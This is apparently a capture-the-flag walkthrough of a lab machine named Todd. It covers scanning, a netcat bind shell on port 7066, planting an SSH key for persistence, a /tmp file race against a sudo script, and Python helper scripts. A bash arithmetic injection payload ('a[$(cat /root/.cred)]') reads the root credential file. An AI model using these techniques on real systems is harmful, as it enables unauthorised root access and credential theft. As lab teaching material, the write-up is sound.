First, a full port scan. We get SSH, HTTP and a lot of unidentified services:
nmap -p- 10.10.1.3 -sCV -oA toddnmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: Mindful Listening
1161/tcp open tcpwrapped
7066/tcp open unknown
7185/tcp open tcpwrapped
9204/tcp open tcpwrapped
9486/tcp open tcpwrapped
20927/tcp open tcpwrapped
21276/tcp open tcpwrapped
23009/tcp open tcpwrapped
23959/tcp open tcpwrapped
28859/tcp open tcpwrapped
29364/tcp open tcpwrapped
HTTP
That's a good quote, by the way. Now let's look at what this site has.
There are tools sitting on the machine, ready for us to use:
fscan: vulnerability scanner
les.sh: Linux privilege escalation auditing tool
linpeas.sh: Linux Privilege Escalation Awesome Script
pspy64: Monitor linux processes without root permissions
I tested the site for file inclusion, but it is not vulnerable to that.
Back to the other ports
Nmap could not identify the other ports (tcpwrapped means the TCP connection was accepted and then closed without a banner), so we banner grab them by hand with nc and see what is going on there. Connecting to 7066 drops us straight into a shell as todd.
The idea of this box is that every port scan gives you a different set of ports, except for 22, 80 and 7066. So it seems we found the bind shell by luck, but that is a good thing to add to our notes. See Beyond root for how the machine does it.
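As an added example (my own code, not something from the box or the original writeup), here is a small Python triage script for that list of unknown ports. It reads the nmap normal-output file (toddnmap.nmap from the -oA above), connects to every open port other than 22 and 80, sends `id` and labels the port by the reply. The host, file name and the replies used in its self-checks are constructed; the labels for fake_ssh follow the description in Beyond root (a listener that either refuses the connection or prints uname -a). Rescan right before running it, because the honeypot ports change every couple of minutes.

```python
#!/usr/bin/env python3
"""Triage the unidentified ports from an nmap scan: poke each one, label the answer.

Added example, not code from the box or the original writeup. Port heuristics follow
the Beyond root section: fake_ssh either refuses the connection or prints uname -a,
and the real bind shell on 7066 runs whatever it is sent.
"""
import re
import socket

PROBE = b"id\n"      # harmless command: a bind shell echoes uid=..., a fake listener does not
KNOWN = {22, 80}     # nmap already identified these; skip them


def parse_open_ports(nmap_text: str) -> list[int]:
    """Open TCP ports from nmap's normal output (the .nmap file written by -oA)."""
    return [int(m.group(1))
            for m in re.finditer(r"^\s*(\d+)/tcp\s+open\b", nmap_text, re.M)]


def classify(reply: bytes) -> str:
    """Label a port by how it answered PROBE."""
    if not reply:
        return "silent: accepted and closed, or refused (honeypot slot?)"
    if reply.startswith(b"SSH-"):
        return "ssh banner"
    if re.search(rb"uid=\d+\(", reply):
        return "BIND SHELL: command executed"
    if reply.startswith(b"Linux "):
        return "uname -a output only (fake_ssh?)"
    return "unknown: " + repr(reply[:60])


def probe(host: str, port: int, timeout: float = 3.0) -> bytes:
    """Connect, send PROBE, return whatever comes back before timeout; b'' on refusal."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(PROBE)
            chunks = []
            try:
                while data := s.recv(4096):
                    chunks.append(data)
            except socket.timeout:
                pass           # the bind shell never closes the socket, so a timeout is normal
            return b"".join(chunks)
    except OSError:
        return b""


def triage(host: str, nmap_text: str) -> dict[int, str]:
    """port -> label for every open port nmap could not name."""
    return {p: classify(probe(host, p))
            for p in parse_open_ports(nmap_text) if p not in KNOWN}


if __name__ == "__main__":
    import sys
    # python3 triage.py 10.10.1.3 toddnmap.nmap
    with open(sys.argv[2]) as f:
        for port, label in triage(sys.argv[1], f.read()).items():
            print(f"{port:>6}/tcp  {label}")
```

Anything labelled BIND SHELL is the port to keep; the silent ones are the decoys that nmap reported as tcpwrapped.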
Stable shell
Now we need a stable shell. The cleanest way is to add our public key to authorized_keys on the machine.
First we create an SSH key pair, then copy id_rsa.pub into authorized_keys in Todd's .ssh directory.
-> our machine
ssh-keygen -t rsa
# I just pressed Enter at every prompt (no passphrase). Fine for a lab box, not a secure practice.
Generating public/private rsa key pair.
Enter file in which to save the key (/home/legend/.ssh/id_rsa):
Enter passphrase for "/home/legend/.ssh/id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/legend/.ssh/id_rsa
Your public key has been saved in /home/legend/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:P2YLcVb9b0GLffz9d9id2uPwRFiiAW/j3XW7RWwn4sQ legend@legend
The key's randomart image is:
+---[RSA 3072]----+
| . |
| o. . . |
| =E.ooB|
| o+=.O**|
| S oo.+ B=|
| = . O|
| . = . =B|
| + o *+*|
| . .o+=|
+----[SHA256]-----+
cat .ssh/id_rsa.pub
-> target machine (in the bind shell, from todd's home directory)
mkdir .ssh; cd .ssh
echo 'ssh-rsa <contents of id_rsa.pub> legend@legend' > authorized_keys
ssh todd@10.10.1.3
bash
todd@todd:~$
todd@todd:~$ ls -la
total 32
drwxr-xr-x 3 todd todd 4096 Apr 7 03:23 .
drwxr-xr-x 3 root root 4096 Mar 22 06:53 ..
lrwxrwxrwx 1 root root 9 Mar 22 08:03 .bash_history -> /dev/null
-rw-r--r-- 1 todd todd 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 todd todd 3526 Apr 18 2019 .bashrc
-rw-r--r-- 1 todd todd 263 Apr 7 02:19 index.html
-rw-r--r-- 1 todd todd 807 Apr 18 2019 .profile
drwxr-xr-x 2 todd todd 4096 Apr 7 03:24 .ssh
-rw-r--r-- 1 todd todd 39 Mar 22 06:54 user.txt
todd@todd:~$ sudo -l
Matching Defaults entries for todd on todd:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User todd may run the following commands on todd:
(ALL : ALL) NOPASSWD: /bin/bash /srv/guess_and_check.sh
(ALL : ALL) NOPASSWD: /usr/bin/rm
(ALL : ALL) NOPASSWD: /usr/sbin/reboot
todd@todd:~$ Connection to 10.10.1.3 closed by remote host.
Connection to 10.10.1.3 closed.
And we still get disconnected, even over SSH. The culprit is /opt/kill_todd.sh (it runs pkill -9 -u todd, see Beyond root), and since sudo lets us run rm as root we can simply delete it:
todd@todd:/opt$ ls -la
total 40
drwxr-xr-x 2 root root 4096 Mar 22 10:40 .
drwxr-xr-x 18 root root 4096 Nov 13 2020 ..
-rwx------ 1 root root 138 Mar 22 08:00 create_nc2.sh
-rwx---r-- 1 root root 141 Mar 22 07:42 create_nc.sh
-rwx------ 1 root root 16608 Mar 22 07:21 fake_ssh
-rwx------ 1 root root 17 Mar 22 07:07 kill_todd.sh
todd@todd:/opt$ sudo /usr/bin/rm kill_todd.sh
and now we have a stable shell and the user flag.
todd@todd:~$ cat user.txt
Todd{*REDACTED*}
#!/bin/bash
# check this script used by human
a=$((RANDOM%1000))
echo "Please Input [$a]"
echo "[+] Check this script used by human."
echo "[+] Please Input Correct Number:"
read -p ">>>" input_number
[[ $input_number -ne "$a" ]] && exit 1
sleep 0.2
true_file="/tmp/$((RANDOM%1000))"
sleep 1
false_file="/tmp/$((RANDOM%1000))"
[[ -f "$true_file" ]] && [[ ! -f "$false_file" ]] && cat /root/.cred || exit 2
This script checks that a human is driving it by asking for the random number it has just printed.
Get it wrong and the script exits.
But what if you are right?
The script then picks two more random names, true_file and false_file, both /tmp/<number> with the number drawn by $((RANDOM%1000)), i.e. 0..999.
It only dumps /root/.cred if true_file exists and false_file does not.
The two names are drawn independently, so creating all 1000 files can never work (false_file would always exist). Instead we pre-create a block of files and hope true_file lands inside it and false_file outside. With files 1..250 the odds per run are 250/1000 * 750/1000, about 19%; a block of 500 would give the best odds at 25%. Each sudo run is a fresh draw, so just rerun until it pays out.
cd /tmp
for i in {1..250}; do
touch "$i"
done
Make sure you run the script with sudo, otherwise the cat of /root/.cred runs as todd and is denied (as in the first attempt below) :(
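To put numbers on the "pray" step, here is an added example (my own code, not from the box or the writeup) that models the two draws in guess_and_check.sh exactly: both file names are /tmp/<RANDOM%1000>, independent and uniform over 0..999, and the cat only runs when true_file is among the files we created and false_file is not. It computes the exact success chance for any block size, finds the best one, estimates the average number of sudo runs needed, and cross-checks by simulation. Nothing here touches the real /tmp; Python's random stands in for bash's $RANDOM.

```python
#!/usr/bin/env python3
"""How likely is the /tmp file trick to work, and how many files should we create?

Added example, not code from the box or the writeup. It models guess_and_check.sh:
true_file and false_file are /tmp/<RANDOM%1000>, drawn independently, so both are
uniform over 0..999. With files 0..n-1 pre-created, the cat only runs when
true_file < n and false_file >= n. Nothing here touches the real /tmp; Python's
random stands in for bash's $RANDOM.
"""
import random

MOD = 1000   # RANDOM%1000 in the script


def success_probability(n: int) -> float:
    """P(true_file among the n created files) * P(false_file not among them)."""
    p = n / MOD
    return p * (1 - p)


def best_n() -> int:
    """Number of files that maximises the odds (n*(1000-n) peaks at n=500)."""
    return max(range(MOD + 1), key=success_probability)


def expected_runs(n: int) -> float:
    """Mean number of sudo runs until the first success (geometric distribution)."""
    return 1 / success_probability(n)


def touch_command(n: int) -> str:
    """The one-liner to create files 0..n-1 in /tmp via bash brace expansion."""
    return f"touch /tmp/{{0..{n - 1}}}"


def simulate(n: int, trials: int, seed: int = 1) -> float:
    """Empirical success rate of the script's own check over `trials` runs."""
    rng = random.Random(seed)
    created = set(range(n))                  # what the touch loop left behind
    wins = 0
    for _ in range(trials):
        true_file = rng.randrange(MOD)       # $((RANDOM%1000))
        false_file = rng.randrange(MOD)      # drawn again, independently
        if true_file in created and false_file not in created:
            wins += 1
    return wins / trials


if __name__ == "__main__":
    for n in (250, 500, 999):
        print(f"n={n:<4} exact={success_probability(n):.3f} "
              f"simulated={simulate(n, 20000):.3f} avg runs={expected_runs(n):.1f}")
    print(touch_command(best_n()))
```

With 250 files you need about five sudo runs on average; with 500 about four. Going past 500 only hurts, because false_file then lands inside the block more often than true_file gains.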
todd@todd:/tmp$ /bin/bash /srv/guess_and_check.sh
Please Input [718]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>718
cat: /root/.cred: Permission denied
todd@todd:/tmp$ sudo /bin/bash /srv/guess_and_check.sh
Please Input [11]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>11
*REDACTED*
and we have the root's password
todd@todd:/tmp$ su
Password:
root@todd:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@todd:/tmp# cd /root
root@todd:~# cat root.txt
Todd{*REDACTED*}
Beyond root
Hahahaha like 0xdf yes.
Honeypot
This machine creates and kills fake SSH ports every 2 minutes.
We could have noticed this if we scanned the ports a couple of times.
kill_todd.sh
pkill -9 -u todd
fake_ssh: a binary that fakes an SSH service; when you connect to it, it either refuses the connection or prints the output of uname -a.
create_nc.sh
#!/bin/bash
# spawn 10 decoy listeners on random ports, each answered by fake_ssh (run as todd)
# $RANDOM is 0..32767, which is why every decoy port in the scan is below 32768
create_ssh(){
    sudo -u todd nc -e /opt/fake_ssh -lp $1
}
for i in $(seq 10)
do
    a=$((RANDOM))
    sleep 0.2
    create_ssh $a &
done
create_nc2.sh
#!/bin/bash
# the real bind shell: a single nc -e /bin/bash listener, always on 7066 ($a is computed but never used)
create_ssh(){
    sudo -u todd nc -e /bin/bash -lp $1
}
for i in $(seq 1)
do
    a=$((RANDOM))
    sleep 0.2
    create_ssh 7066 &
done
Root without the file race
There is a second, deterministic way in. The human check `[[ $input_number -ne "$a" ]]` hands our input to bash's arithmetic evaluator, and an array subscript containing a command substitution is expanded there, so whatever sits inside $( ) runs with the script's privileges, i.e. as root under sudo. The "syntax error" is just bash choking on the command's output after the command has already executed:
>>>a[$(id)]
/srv/guess_and_check.sh: line 35: uid=0(root) gid=0(root) groups=0(root): syntax error in expression (error token is "(root) gid=0(root) groups=0(root)")
so we can read /root/.cred the same way:
>>>a[$(cat /root/.cred)]
/srv/guess_and_check.sh: line 35: *REDACTED*: syntax error in expression (error token is "*REDACTED*")
We will use . and lucky us, this machine has it ready for us
A note on kill_todd.sh: pkill -u todd terminates every process owned by todd, and -9 sends SIGKILL, which cannot be caught or ignored by the process, so it is forced to exit. This is generally considered rude but may be necessary; here it is what kept dropping our shells.